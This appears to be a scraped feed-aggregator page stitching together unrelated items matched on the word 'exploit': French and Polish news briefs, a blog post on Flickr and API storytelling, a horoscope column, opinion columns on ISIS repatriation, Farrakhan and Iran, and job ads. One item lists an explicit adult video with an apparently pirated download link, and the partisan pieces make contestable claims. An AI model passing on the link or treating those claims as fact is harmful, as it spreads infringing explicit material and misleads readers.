          Trump annonce que son administration pourrait envisager des procédures antitrust contre Amazon, Facebook et Google lors d'un entretien      Cache   Translate Page      
Trump annonce que son administration pourrait envisager des procédures antitrust contre Amazon, Facebook et Google
lors d'un entretien

En juillet dernier, l'UE a infligé une amende record de 4,34 milliards d'euros à Google pour avoir abusé de la position dominante de son système d'exploitation mobile Android. La Commission européenne a également sommé l'entreprise américaine « de mettre fin à ses pratiques illégales dans les 90 jours, sous peine de se voir infliger des astreintes allant jusqu'à...
          PureTaboo India Summer To Catch a Cheater      Cache   Translate Page      
  PureTaboo India Summer To Catch a Cheater MILF & Mature, Older / Younger, Step Mom, Family Roleplay, Cheating, Exploitation, Step son 385.55 MiB h264, yuv420p, 854×480, 23.98 fps(r) => 853×480 (und) 00:47:04 Keep2share Download Links https://k2s.cc/file/bdb7d09a95824/pureo.6.india.summer.to.catcr.rar
          11/7/2018: HIGH-TECH & MEDIAS: Le groupe développe un robot ramasseur de tomates      Cache   Translate Page      

En 1985, le Japon comptait encore 5,5 millions d’agriculteurs. Et seulement 20 % des exploitants étaient alors âgés de plus de 65 ans. Selon les dernières statistiques du ministère de l’Agriculture et de la Pêche, le pays n’a plus aujourd’hui que 1,9...
          11/7/2018: TERRITOIRES TALENTS: La trame historique du textile résiste sur le marché du haut de gamme      Cache   Translate Page      

Faire porter ses chaussettes fabriquées à Troyes à une équipe nationale chinoise lors des prochains Jeux Olympiques d’hiver. Cet exploit, Benoît Seguin, le PDG de la société Tismail, est à deux pas de le réaliser. « Ce n’est plus uniquement de l’ordre...
          La filière Foie gras est de retour      Cache   Translate Page      
Renforcement de la réglementation sur la conduite des élevages et sur le transport des animaux, mise en place de contrôles préalables à tout déplacement d’animaux, création d’un système d’alerte au niveau national pour améliorer les réactions collectives en cas de crise... Le tout sans remettre en cause le principe de l'élevage en plein air, véritable ADN des pratiques d’élevage des acteurs de la filière palmipèdes à foie gras. Le travail et les investissements, notamment au niveau des producteurs, ont été importants ces 2 dernières années, suite au double épisode d'épizootie aviaire qui a frappé les exploitations. Mais les efforts paient. La dynamique de production est bien repartie en 2018 et celle des ventes de foie gras devrait suivre, pour des consommateurs toujours confiants dans la filière française.
          Forêt bois : les professionnels en action pour redynamiser la filière dans les Pyrénées-Atlantiques      Cache   Translate Page      
Dans les Pyrénées-Atlantiques, le tiers de la superficie du département est occupé par des forêts, mais seul un tiers de celle-ci est exploitée. Le grand objectif des Assises de la Forêt et du Bois en Pyrénées-Atlantiques était, outre le rapprochement et la concertation commune de l'ensemble des acteurs, la proposition d'une feuille de route opérationnelle pour le maintien et le développement de la filière. Un travail « salvateur » pour la filière, qui s'engage ainsi selon Hervé Madéo ; Président de Fransylva, syndicat de la forêt privée Pyrénées Adour, « à sortir de sa zone de confort et de ses vieilles habitudes pour agir face aux enjeux actuels ». Précisément, ce sont 10 actions phare, déclinées en 42 propositions qui ont été identifiées par l'interprofession au fil de 4 axes de travail. Une feuille de route présentée aux partenaires institutionnels ce 26 octobre à Pau.
          Flickr And Reconciling My History Of APIs Storytelling      Cache   Translate Page      

Flickr was one of the first APIs that I profiled back in 2010 when I started API Evangelist. Using their API as a cornerstone of my research, resulting in their API making it into my history of APIs storytelling, continuing to be a story I’ve retold hundreds of times in the conversations I’ve had over the eight years of being the API Evangelist. Now, after the second (more because of Yahoo?) acquisition, Flickr users are facing significant changes regarding the number of images we can store on the platform, and what we will be charged for using the platform–forcing me to step back, and take another look at the platform that I feel has helped significantly shape the API space as we know it.

When I step back and think about Flickr, it’s most important contribution to the world of APIs was all about the resources it made available. Flickr was the original image sharing API, powering the growing blogosphere at the beginning of this century. Flickr gave us a simple interface for humans in 2004, and an API for other applications just six months later, that provided us all with a place to upload the images we would be using across our storytelling on our blogs. Providing the API resources that we would be needed to power the next decade of storytelling via our blogs, but also set into the motion the social evolution of the web, demonstrating that images were an essential building block of doing business on the web, and in just a couple of years, on the new mobile devices that would become ubiquitous in our lives.

Flickr was an important API resource, because it provided access to an important resource–our images. The API allowed you to share these meaningful resources on your blog, via Facebook and Twitter, and anywhere else you wanted. In 2005, this was huge. At the time, I was working to make a shift from being an developer lead, to playing around with side businesses built using the different resources that were becoming available online via simple web APIs. Flickr quickly became a central actor in my digital resource toolbox, and I was using it regularly in my work. As an essential application, Flickr quickly got out of my way by offering an API. I would still use the Flickr interface, but increasingly I was just publishing images to Flickr via the API, and embedding them in blogs, and other marketing, becoming what we began to call social media marketing, and eventually was something that I would rebrand as API Evangelist while making it more about the tooling I was using, than the task I was accomplishing.

After thinking about Flickr as a core API resource, next I always think about the stories I’ve told about Flickr’s Caterina Fake who coined the phase, “business development 2.0”. As I tell it, back in the early days of Flickr, the team was getting a lot of interest in the product, and unable to respond to all emails and phone calls. They simply told people to build on their API, and if they were doing something interesting, they would know, because they had the API usage data. Flickr was going beyond the tech and using an API to help raise the bar for business development partnerships, putting the burden on the integrator to do the heavy lifting, write the code, and even build the user base, before you’d get the attention of the platform. If you were building something interesting, and getting the attention of users, the Flickr team would be aware of it because of their API management tooling, and they would reach out to you to arrange some sort of partner relationship.

It makes for a good story. It resonates with business people. It speaks to the power of doing APIs. It is also enjoys a position which omits so many other negative aspects of doing startups, which as a technologist becomes too easy to look the other way when you are just focused on the tech, and as a business leader after the venture capital money begins flowing. Business development 2.0 has a wonderful libertarian, pull yourself up by your bootstrap ring to it. You make valuable resources available, and smart developers will come along and innovate! Do amazing things you never thought of! If you build it, they will come. Which all feeds right into the sharecropping, and exploitation that occurs within ecosystems, leading to less than ethical API providers poaching ideas, and thinking that it is ok to push public developers to work for free on their farm. Resulting in many startups seeing APIs as simply a free labor pool, and source of free road map ideas, manifesting concepts like the “cloud kill zone”. Business development 2.0 baby!!

Another dimension of this illness we like to omit is around the lack of a business model. I mean, the shit is free! Why would we complain about free storage for all our images, with a free API? It is easier for us to overlook the anti-competitive approaches to pricing, and complain down the road when each acquisition of the real product (Flickr) occurs, than it is to resist companies who lack a consumer level business model, simply because we are all the product. Flickr, Twitter, Facebook, Gmail, and other tools we depend on are all free for a reason. Because they are market creating services, and revenue is being generated at other levels out of our view as consumers, or API developers. We are just working on Maggie’s Farm, and her pa is reaping all the benefit. When it come’s to Flickr, Maggie and her {a cashed out a long time ago, and the farm keeps getting sold and resold, all while we still keep working away in the soil, giving them our digital bits that we’ve cultivate there, until conditions finally become unacceptable enough to run us off.

I’ve begun moving off of Flickr a couple years ago. I stopped using them for blog photo hosting in 2010. I stopped uploading photos there regularly over the last couple years. The latest crackdown doesn’t mean much to me. It will impact my storytelling to potentially lose such an amazing resource of openly licensed photos. However, I’ve saved each photo I use, and it’s attribution locally–hopefully my attribution link doesn’t begin to 404 at some point. Hopefully other openly licensed photo collections emerge on the horizon, and ideally SmugMug doesn’t do away with openly licensed treasure trove they are stewards of now. The latest acquisition and business model shift occurring across the Flickr platform doesn’t hit me too hard, but the situation does give me an opportunity to step back and reassess my API storytelling, and the role that Flickr plays in my API Evangelist narrative. Giving me another opportunity to eliminate bullshit and harmful myths from my storytelling and myth making–which I feel like is getting pretty close to leaving me with nothing left to tell when it comes to APIs.

In the end, if I just focus purely on the tech, and ignore the business and politics of APIs, I can keep telling these bullshit. This is the real Flickr lesson for me. I’d say there is two reasons we perpetuate stories like this. One, “because we just didn’t know any better”. Which is pretty weak. Two, it is how capitalism works. It is why us dudes, especially us white dudes thrive so well in a Silicon Valley tech libertarian world, because this type of myth making benefits us, even when it repeatedly sets us up for failure. This is one of the things that makes me throw up a little (a lot) in my mouth when I think about the API Evangelist persona I’ve created. This entire reality makes it difficult for me to keep doing this API Evangelist theater each day. APIs are cool and all, but when they are wielded as part of this larger money driven stream of consciousness, we (individuals) are always going to lose. In the end, why the fuck do I want to be a mouthpiece for this kind of exploitation. I don’t.

Photo Credit: Kin Lane (The First Photo I Uploaded to Flickr)


          11/6/2018: Business: Retrained staff ‘key to exploiting big data’      Cache   Translate Page      
SKILLS shortages, particularly in the area of analytics, are hurting the ability of firms to exploit technological opportunities. Two-thirds of large organisations and businesses surveyed say they want to hire more analytics staff over the next 12...
          [ASAP] Exploiting Macromolecular Design To Optimize the Antibacterial Activity of Alkylated Cationic Oligomers      Cache   Translate Page      

TOC Graphic

Biomacromolecules
DOI: 10.1021/acs.biomac.8b01317

          Edge z poważną luką. Exploit pozwala uruchomić programy na komputerze ofiary      Cache   Translate Page      
image W przeglądarce Mictosoft Edge znaleziona została kolejna groźna luka, pozwala na zdalne wykonanie kodu. Odkrycie jest świeże i jeszcze nie znamy szczegółów, Microsoft także nie został o niej powiadomiony. Odkrywcy podatności obiecali opublikować szczegółowy opis i przykładowy atak w najbliższych dniach. Informacje o luce pojawiły się z początkiem listopada, a dowodem na jej istnienie jest…
          Auditeur interne pôle exploitation H/F (CDI)      Cache   Translate Page      
Poste : Rattaché à la Direction de l'Audit Interne, vous réalisez des missions d'audit opérationnel &hellip;
          Ligue des champions: Paris manque l'exploit à Naples mais sauve ses chances de qualification      Cache   Translate Page      
Naples (Italie) - L'enfer promis du San Paolo a failli se transformer en paradis : le Paris SG, incapable de profiter de la défaite de Liverpool en concédant le nul sur le terrain de Naples (1-1) mardi soir, reste troisième du groupe "de la mort" de la Ligue des champions.
          My Factory Planet Layouts      Cache   Translate Page      
I am posting my version of factory planets that take Tier 1 products and miraculously turn them into Tier 4 products. Please try not to dwell too much on my amazing Paint skills… I have Command Center Upgrades 5 and am able to exploit 6 planets.
           Comment on John Galsworthy: The war made us all into barbarians by Keith McLennan       Cache   Translate Page      
An interesting early example of liberal guilt over the Treaty of Versailles. Hitler held similar views and made a career out of them. He was writing Mein Kampf, in which he spoke of "the rage of the international exploiters of our people in Versailles", at exactly the same time as Galsworthy was writing The Silver Spoon. He didn't go as far as calling the Treaty "rank barbarism", though. Only the intellectuals of the democracies did that.
           Comment on John Galsworthy: The war made us all into barbarians by Keith McLennan       Cache   Translate Page      
An interesting early example of liberal guilt over the Treaty of Versailles. Hitler held similar views and made a career out of them. He was writing Mein Kampf, in which he wrote of "the rage of the international exploiters of our people in Versailles", at exactly the same time as Galsworthy was writing The Silver Spoon. He didn't go as far as calling the Treaty "rank barbarism", though. Only the intellectuals of the democracies did that.
          Work passport released for migrants following Govt announcement on workgroup      Cache   Translate Page      

FIRST Union and its affiliates; the Union Network of Migrants (UNEMIG) and the Indian Workers’ Association (IWA) have released a handbook for migrant workers in New Zealand to share with their friends and families to help protect migrant workers against exploitation at its biennial conference t


          Young black creatives are exploited by a broken system — 2 SU seniors want to change that      Cache   Translate Page      

Serving as a liaison between creators and brands, CLLCTVE empowers young creatives to develop their craft, understand their respective industries, recognize opportunities and precisely quantify the value of their work.
Continue reading

The post Young black creatives are exploited by a broken system — 2 SU seniors want to change that appeared first on The Daily Orange - The Independent Student Newspaper of Syracuse, New York.


          Equipping and exploiting ground skate park guides equipping and exploiting the skate park of reza      Cache   Translate Page      
Tender are Invited for Equipping and Exploiting Ground Skate Park Guides Equipping and Exploiting the Skate Park of Reza

Deposit amount: 192,000,000 403,000,000 (rials)
          Free Will Astrology      Cache   Translate Page      
November 7–13 by Rob Brezsny

ARIES (March 21–April 19): In 1994, Aries pop diva Mariah Carey collaborated with an associate to write the song "All I Want for Christmas Is You." It took them 15 minutes to finish it. Since then, it has generated $60 million in royalties. I wish I could unconditionally predict that you, too, will efficiently spawn a valuable creation sometime soon. Current planetary alignments do suggest that such a development is more possible than usual. But because I tend to be conservative in my prophecies, I won't guarantee anything close to the $60 million figure. In fact, your reward may be more spiritual in nature than financial.

TAURUS (April 20–May 20): A post on Reddit asked readers to write about "the most underrated feeling of all time." One person said, "When you change the sheets on your bed." Another extolled "the feeling that comes when you pay all your bills and you've still got money in the bank." Others said, "dancing under the rain," "physical contact like a pat on the back when you're really touch starved," and "listening to a song for the first time and it's so good you just can't stop smiling." I bring this to your attention, Taurus, because I suspect that the next two weeks will bring you a flood of these pleasurable underrated feelings.

GEMINI (May 21–June 20): "Beer makes you feel the way you ought to feel without beer," wrote Gemini author Henry Lawson. Do you have any methods for making yourself feel like you've drunk a few beers that don't involve drinking a few beers? If not, I highly recommend that you find at least one. It will be especially important in the coming weeks for you to have a way to alter, expand, or purify your consciousness without relying on literal intoxicants or drugs. The goal is to leave your groove before it devolves into a rut.

CANCER (June 21–July 22): Study the following five failed predictions. (1) "There is no likelihood man can ever tap the power of the atom." —Robert Millikan, Nobel laureate in physics, 1923. (2) "This 'telephone' has too many shortcomings to be seriously considered as a means of communication. The device is inherently of no value to us." —Western Union internal memo, 1876. (3) "Rail travel at high speeds is not possible because passengers, unable to breathe, would die of asphyxia." —Dionysius Lardner, scientist, 1830. (4) "There is no reason anyone would want a computer in their home." —Ken Olsen, president of Digital Equipment Corporation, 1977. (5) "Most Cancerians will never overcome their tendencies toward hypersensitivity, procrastination, and fear of success." —Lanira Kentsler, astrologer, 2018. (P.S. What you do in the next 12 months could go a long way toward permanently refuting the last prediction.)

LEO (July 23–Aug 22): German scientists have created cochlear implants for gerbils that have been genetically modified, enabling the creatures to "listen" to light. The researchers' work is ultimately dedicated to finding ways to improve the lives of people with hearing impairments. What might be the equivalent of you gaining the power to "hear light"? I understand that you might resist thinking this way. "That makes no sense," you may protest or "There's no practical value in fantasizing about such an impossibility." But I hope you'll make the effort anyway. In my view, stretching your imagination past its limits is the healing you need most right now. I also think that doing so will turn out to be unexpectedly practical.

VIRGO (Aug 23–Sept 22): Here's useful wisdom from the poet Rumi. "Our defects are the ways that glory gets manifested," he said. "Keep looking at the bandaged place. That's where the light enters you." Playwright Harrison David Rivers interprets Rumi's words to mean, "Don't look away from your pain, don't disengage from it, because that pain is the source of your power." I think these perspectives are just what you need to meditate on, Virgo. To promote even more healing in you, I'll add a further clue from poet Anna Kamienska: "Where your pain is, there your heart lies also." (P.S. Rumi is translated by Coleman Barks, Kamienska by Clare Cavanagh.)

LIBRA (Sept 23–Oct 22): Artist David Hockney is proud of how undemanding he is toward his friends and associates. "People tell me they open my e-mails first," he says, "because they aren't demands and you don't need to reply. They're simply for pleasure." He also enjoys giving regular small gifts. "I draw flowers every day and send them to my friends so they get fresh blooms." Hockney seems to share the perspective expressed by author Gail Godwin, who writes, "How easy it was to make people happy, when you didn't want or need anything from them." In accordance with astrological omens, Libra, I suggest you have fun employing these approaches in the coming weeks.

SCORPIO (Oct 23–Nov 21): I am not currently a wanderer or voyager or entrepreneur or swashbuckler. But at other times in my life, I have had extensive experience with those roles. So I know secrets about how and why to be a wanderer and voyager and entrepreneur and swashbuckler. And it's clear to me that in the coming weeks, you could benefit in unforeseen ways from researching and embodying the roles of curious wanderer and brave voyager and savvy entrepreneur and prudent swashbuckler.

SAGITTARIUS (Nov 22–Dec 21): "The best thing one can do when it is raining is let it rain." That brilliant formulation came from poet Henry Wadsworth Longfellow. Does it seem so obvious as to not need mentioning? Bear with me while I draw further meaning from it and suggest you use it as an inspiring metaphor in the coming weeks. When it rains, Sagittarius, let it rain; don't waste time and emotional energy complaining about the rain. Don't indulge in fruitless fantasizing about how you might stop the rain and how you'd love to stop the rain. In fact, please refrain from defining the rain as a negative event, because, after all, it is perfectly natural and is crucial for making the crops grow and replenishing our water supply. (P.S. Your metaphorical "rain" will be equally useful.)

CAPRICORN (Dec 22–Jan 19): "Every true love and friendship is a story of unexpected transformation," writes activist and author Elif Shafak. "If we are the same person before and after we loved, that means we haven't loved enough." I bring this to your attention because you're in a phase when your close alliances should be activating healing changes in your life. If for some reason your alliances are not yet awash in the exciting emotions of redemption and reinvention, get started on instigating experimental acts of intimacy.

AQUARIUS (Jan 20–Feb 18): I suspect you will be an especially arousing influence in the coming weeks. You may also be inspiring and disorienting, with unpredictable results. How many transformations will you unleash? How many expectations will you dismantle? How many creative disruptions will you induce in the midst of the daily grind? I hesitate to underestimate the messy beauty you'll stir up or the rambunctious gossip you'll provoke. In any case, I plan to be richly amused by your exploits, and I hope everyone else will be, as well. For best results, I will pray to the Goddess of Productive Fun, begging Her to ensure that the commotions and uproars you catalyze will be in service to love and kindness.

PISCES (Feb 19–March 20): Gonzo journalist Hunter S. Thompson wasn't always a wild and crazy writer. Early in his career, he made an effort to compose respectable, measured prose. When he finally gave up on that project and decided he could "get away with" a more uninhibited style, he described it as being "like falling down an elevator shaft and landing in a pool full of mermaids." I foresee a metaphorically comparable development in your future, Pisces.

Homework: When they say "Be yourself," which self do they mean? Testify at freewillastrology.com

[ Comment on this story ]

[ Subscribe to the comments on this story ]


          Rosie DiManno: Why Canada must repatriate the children of jihadist nationals      Cache   Translate Page      

Can we at least save the children?

It shouldn’t even be a question — rescuing the spawn of a delusional caliphate, born to a Canadian parent.

Because the alternative is to leave these kids in detention camps overseas that are breeding grounds for the next generation of terrorists.

That too is part of the long game being played by the Islamic State. Keeping the idea alive of a proto-state sustained by a covert global network with a weakened but enduring core. Making alliances with other terrorist groups. Re-establishing a foothold in lawless states. Continuing to exploit a sophisticated social media recruitment outreach to radicalize adherents.

It is a multi-generational war requiring a multi-generational counterattack to un-indoctrinate, rehabilitate and reintegrate.

Not the fighter fathers, who should be prosecuted to the fullest extent of the law — although Canadian officials have been confounded by the how of doing this. Perhaps not the mothers who are authors of their own misfortune, willingly or via self-ascribed ignorance. But surely the children who are innocent of crime even if they’ve committed crimes as passive or active child soldiers.

Which might very well mean, at its most stringent, separating those children from their mothers.

Most of these “caliphate” kids are far younger than the Geneva Protocol definition of child soldier as those under age 18. Some have been born to mothers already in detention.

Endangered youngsters are seized by child welfare agencies all the time, or until such time that a parent can prove fitness to rear. Fostering isn’t an optimal solution but it’s sometimes the least harmful option, particularly if the child can be placed inside his or her broader family, a grandparent, an aunt, a guardian.

Is it more inhumane to wrest a child from a mother’s arms or to leave that child in a godforsaken environment, behind barbed wire, vulnerable to disease, malnourishment and embittered ideology?

“I don’t have a good answer for that,” admits Shelly Whitman, executive director of the Romeo Dallaire Child Soldiers Initiative at Dalhousie University in Halifax.

Whitman argues that these children, even if they’ve been raised to cleave to jihadist beliefs, have a better chance at rehabilitation than adults. “It’s not the fault of the child. The way the brain works, if you have experienced trauma under the age of 17, you have a good chance of overcoming it. The malleability of the brain is much more difficult the older you get.”

There are those who claim rehabilitation from radicalism is a fraud, that the metrics are unreliable. Yet Whitman and others with expertise in the area point to quantifiable success. “If this can be done in conflict zones, why would we not think we’re capable of it in a country like Canada, where those children will be exposed to people who are caring and willing to help.”

I’ve seen that myself, in reintegration camps in the Congo for children rescued from the Lord’s Resistance Army — kids who cannot return to their villages because they’ve committed horrific crimes against their families as enslaved abductees.

Children with Canadian blood in their bones simply can’t be abandoned to a grim fate.

Global News recently reported there are at least 13 Canadians — three alleged terrorists, their wives and children — currently detained by Kurdish authorities in Syria. These kids are among the detritus of a failed ambition.

ISIS — or Daesh — has been all but destroyed in northern Syria and Iraq, at least territorially, with 95 per cent of the ground it once held liberated and tens of thousands of its fighters killed by a U.S.-led coalition. But it’s definitely not dead. It’s shape-shifting. Even as a purely combat non-state army, there are still 14,000 ISIS fighters in Syria and 17,000 in Iraq, according to a Pentagon report released in August.

It is estimated that 40,000 foreigners from 110 countries travelled to Iraq and Syria to join the jihadists.

In fact, ISIS has been making a comeback of sorts in recent months, as smaller attacks have become more frequent and with the adaptation of tactics such as weaponized drones. These are the boomerang effects of making war on ISIS — they learn, they pay it back.

Among their most fertile potential conscripts are children who were either born into the war or taken to the “caliphate.” Many of the women have been widowed; some are detained separately from their captured husbands.

Nobody wants them, including their captors. Few countries have any strategy for dealing with them.

In Iraq, some 1,000 women accused of belonging to ISIS have been rounded up from the ruins of towns and cities previously held by the insurgents, More than 800 infants are being held with their mothers. On one day in May, as reported by the Guardian, following 10-minute trials, 40 of those women were sentenced to death by hanging.

Kurdish forces currently holding hundreds of women and children captured on the battlefield are determined to deport them to their countries of origin.

A couple of weeks ago, France announced that it is working on repatriating the children of jihadist nationals — about 150 have been identified — but not their mothers. Belgium and Denmark are considering similar undertakings. The United Kingdom has stripped citizenship from known terrorists with dual citizenship, including two members of the notorious “Beatles,” originally a four-man cell suspected of committed 27 beheadings and now held by Kurdish forces.

British officials have said the government will bring home of some of the jihadist widows, a group pegged at about 80, from among the 360 British terror subjects still believed to be in Syria and Iraq (from an estimated 900 British subjects who went to fight). But there was instant outrage when a Sunday Times investigation reported that, among the 80 women, some had been part of a deadly terror cell linked to Jihadi John (Mohammed Emwazi), who had performed and filmed executions for ISIS before being himself killed in a 2015 drone strike.

Britain and France are among the countries that have suffered most deeply at the hands of homegrown jihadists so the leeriness is understandable. Earlier this year, a British extremist was sentenced to life in prison upon conviction of grooming children as young as 11 at an East London mosque — showing them footage of beheadings and conducting terrorism role-play exercises.

Canada’s contribution to ISIS has been relatively small. As of last year, the government reported there were about 190 extremists “with a nexus to Canada” who’d travelled overseas to engage in terrorism and another 60 who have returned. Prime Minister Justin Trudeau last month supported a Conservative-tabled motion to devise a federal strategy within 45 days to deal with Canadian jihadists who want to come home.

This came on the heels of on-the-scene reporting by Global TV’s Stewart Bell — this country’s most accomplished terrorism journalist — who’d interviewed Muhamed Ali, a.k.a. Abu Turaab Al-Kanadi, allegedly an ISIS sniper who hails from Mississauga, at a detainee facility run by the Syrian Democratic Forces, along with several wives of fighters held at another camp.

All yearn to come home.

Historically, repatriation is fundamental to the aftermath of ceasefire. Of course there has been no ceasefire with ISIS, never will be.

But a nation of mercy doesn’t visit the sins of the father or the mother upon the child.

Rosie DiManno is a columnist based in Toronto covering sports and current affairs. Follow her on Twitter: @rdimanno


          Répartiteur, Maintenance intégrée - ArcelorMittal Exploitation minière Canada s.e.n.c. - Longueuil, QC      Cache   Translate Page      
Statut: Permanent resident Le titulaire du poste de Répartiteur, maintenance intégrée fait partie du centre de gestion intégrée des opérations (IROC). Il est...
From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 17 Oct 2018 14:46:23 GMT - View all Longueuil, QC jobs
          Les représentations que les agriculteurs ont des plantes cultivées influencent-elles les modalités d’adoption et d’usage des technologies numérique d’information et de communication ? Le cas des technologies de l'information et de la communication (TIC) en viticulture et maraîchage       Cache   Translate Page      
Le stage consiste en un travail d'enquêtes qualitatives auprès d'une vingtaine d'agriculteurs utilisant des dispositifs numériques auprès de leurs plantes. L'objectif est de comprendre les représentations qu'ils ont des plantes et d'analyser dans quelle mesure elles influencent les modalités d’adoption et d’usage des technologies de l'information et de la communication au sein de l’exploitation.
          Dpt Yvelines 78, à louer GRANDCHAMP LES ECURIES de PAINCOURT      Cache   Translate Page      
2500
PROCHE RAMBOUILLET à GRAND CHAMP, A LOUER LES ÉCURIES DE PAINCOURT , POUR TOURISME ÉQUESTRE comprenant: 28 boxes à chevaux, Salle de sellerie, Grand club house NEUF,Bar, Cuisine, 12 chambres individuelles à rénover, Appartement de lexploitant 6...
15 pièces 1000 m² 2 EUR/m²
Wed, 31 Oct 2018 13:51:20 -0400
          IELTS Teacher (Full-time/Part-time) - 环球雅思温哥华官方学校 - Burnaby, BC      Cache   Translate Page      
_Fully conversant with the IELTS test and the experience of exploiting testing approaches and techniques in class to optimize learning outcomes;_....
From Indeed - Mon, 15 Oct 2018 22:30:24 GMT - View all Burnaby, BC jobs
          Louis Farrakhan, Live from Tehran      Cache   Translate Page      

Monday November 5, one day before the election, marked the resumption of sanctions on the Islamic regime by the Trump administration. Nation of Islam boss Louis Farrakhan flew to Iran to speak out on behalf of the ruling mullahs.

As Fox News reported, Farrakhan told Mohsen Rezaei, Secretary of Iran’s Expediency Council: “Today, I warn the American government that sanctioning Iran is a big mistake.” The eager Farrakhan failed to flag any mistakes by the Iranian Islamic regime, the world’s biggest sponsor of terrorism. And Farrakhan took care to time his visit with an important event.

Thirty-nine years ago, in 1979, the Islamic regime of the Ayatollah Khomeini invaded the U.S. embassy in Tehran, took more than 50 American diplomats and civilians hostage, and held them for 444 days. Farrakhan marked the anniversary by telling law students at the University of Tehran, that “America has never been a democracy” and then led the students in a chants of “Death to America!” and “Death to Israel!”

No one in America had ever seen a performance quite like that. On the other hand, in his live Tehran show the Nation of Islam boss was not advancing any new themes.

On October 14, the 23rd anniversary of the Million Man March, Farrakhan addressed a cheering audience in Detroit: “To the members of the Jewish community that don’t like me — thank you very much for putting my name all over the planet…I’m not mad at you, ‘cuz you’re so stupid.” The Nation of Islam leader also claimed “I’m not an anti-Semite. I’m anti-Termite,” and repeated that message in a tweet.

Harvard law professor Alan Dershowitz denounced the speech and called out presidents Obama and Clinton, along with former DNC boss Keith Ellison, for their ties to Farrakhan. Even so, prominent Democrats running for office were not swift to denounce Farrakhan for his Jews-are-termites speech. In fact, Farrakhan thrives on special treatment from high-profile Democrats.

“Louis Farrakhan has ingratiated himself with the liberal elite in the United States,” Howard Feldman noted after the “termites” speech. “Both Obama and the Clintons have been photographed alongside him. And whereas they publicly denounce his attitude towards Jews, the fact that they continue to be seen with him is that which empowers him.”

True to form, at the funeral of Aretha Franklin, who passed away in August, Farrakhan got a place of honor, right up front with Democrats Bill Clinton, Jesse Jackson, Al Sharpton and Erica Holder. Many speakers exploited the occasion to bash President Trump, but none of the prominent Democrats took Farrakhan to task about anything. Viewers got the impression the Democrats liked being seen with him.

Back in 2005, a smiling Illinois Senator Barack Obama duly posed with Farrakhan for a photograph that only recently emerged. That was no surprise because the senator’s 1995 Dreams from My Father portrayed the Nation of Islam in a completely favorable light.

The author’s hatemongering Chicago pastor Jeremiah Wright, who prefers “God damn America” to “God bless America,” was a longtime pal of Farrakhan, and the Dreamsauthor participated in the Million Man March. In 2008, when the dreamer ran for president, Farrakhan called him the “messiah.” 

Once elected, POTUS 44 preferred to target conservatives rather than take Farrakhan or Wright to task. In similar style, for the most part, the establishment media have remained uncritical of the Nation of  Islam boss, even though his racist views were no secret.

As Stanley Crouch explained in the Village Voice in 1985, in the view of Louis Farrakhan, “the white man was a devil ‘grafted’ from black people in an evil genetic experiment by a mad, pumpkin-headed scientist named Yacub. That experiment took place 6000 years ago. Now the white man was doomed, sentenced to destruction by Allah.”  It follows that, regardless of self-image, anyone who believes that Dave Brubeck, Albert Einstein, Eleanor Roosevelt and the Wright Brothers are the devilish result of Yacub’s failed experiment is a racist.

In 2016, Hillary Clinton was quick to target Trump supporters as racists, sexists, homophobic, islamophobic, and so forth, a veritable “basket of deplorables.” When it comes to racism, the former First Lady and Secretary of State, who would still like to be president, pretty much gives Farrakhan a free pass.

For his part, the Nation of Islam mouthpiece knows he can call Jews termites, denounce America from Tehran, and most prominent Democrats will treat him gently. In reality, his “Death to America” chant differs from the Democrats only in degree, not in kind.

Now completely dominated by the left, Democrats despise the America that actually exists, with its culture, history, traditions and borders. Their dream is the future social justice America, with no borders. In the Democrats’ vision, only their party prevails, with help from an imported electorate.

"No Trump, no wall, no USA at all,” the refrain of leftist Democrats, is no great distance from “Death to America,” as chanted by Louis Farrakhan in Tehran. Democrats have effectively empowered this loathsome racist and anti-Semite. At election time or any time, non-Democrats, journalists and civil rights leaders would be wise call them on it.


          Is The Anti-Iran Front Still Viable?      Cache   Translate Page      

Israel’s current preoccupation with Hamas in the Gaza Strip, and the Jamal Khashoggi murder in Istanbul, have diverted attention from the nefarious activities carried out by the Islamic Republic of Iran throughout the Middle East, and particularly in Syria.  For now, the above developments have put on hold the anti-Iran alliance the Trump administration has been pressing for last month, and has given the Iranian regime a respite.  The downing of the Russian spy plane over Syria by the Assad regime, which was initially blamed on Israel, has impacted somehow on the previous understanding between Israel and Putin’s Russia.  In the meantime, Russia has supplied the Assad regime with the S-300 Missile defense system. Israel has significantly reduced its operations in Syria, which enabled Iran to increase its activities inside Syria, and foment trouble in Gaza.

The recently imposed U.S. sanctions against Iran have had a deleterious impact on the Iranian economy.  It has placed the regime of the Ayatollahs in a defensive mode.  A second wave of U.S. sanctions commenced on November 5th, 2018, targeting Iran’s energy, shipping, and shipbuilding sectors, as well as transactions with the Central Bank of Iran.  The aim of this set of sanctions is to deprive the Iranian regime of funds to advance their nuclear program, and the development of ballistic missiles.  The Iranian people, in an unprecedented wave of protests that spread throughout Iran’s major cities, and in spite of severe consequences, demanded that the regime invest in Iran, and the Iranian people.  The protesters charged the regime with enabling the Islamic Revolutionary Guards Corps (IRGC) to waste the nation’s oil revenue and the $150 billion it received as a “bonus” from the Obama administration (for agreeing to sign the nuclear deal, also known as the Joint Comprehensive Plan of Action) on imperial schemes.  They have argued that the money should be invested at home instead of spending it in Syria, Iraq, Lebanon, and Yemen.

The Saudi-Qatari rift has also hampered the creation of a unified anti-Iranian bloc.  It has weakened the Gulf Cooperation Council (GCC).  The Qataris are now allied with Turkey.  Ankara has sent an expeditionary force of 3,000 strong to Doha and in return, received $15 billion from Qatar to cover its swollen debt.  The Saudis have accused Qatar of supporting terrorism, and in fact the Doha regime has been a staunch supporter of the Muslim Brotherhood, including Hamas in Gaza.  Turkey’s dictator, Erdogan, has been flirting with Russia and Iran, and has openly exhibited his anti-western sentiments.  He has purchased from Russia the S-400 surface-to-air missiles, and helped Iran launder its oil revenue.  In the initial Trump administration calculation, Turkey was meant to be a part of the anti-Iran coalition, along with Israel and the Gulf states.  Instead, Erdogan is currently busy with embarrassing the Saudis over the Khashoggi murder at the Saudi embassy in Istanbul.

The Islamic Republic is worried that the U.S. might join Israel in its efforts to expel the Iranian extensive presence in Syria.  Iran however, is using this window of opportunity when Israel is limiting its attacks on Iranian targets in Syria, and the U.S. being preoccupied with the mid-term elections, to provide Hezbollah with sophisticated guidance systems that would improve the accuracy of the missiles aimed at Israel.  According to a western intelligence officer, “The Iranians are trying to come up with new ways and routes to smuggle weapons from Iran to its allies in the Middle East, testing and defying the West’s abilities to track them down.”

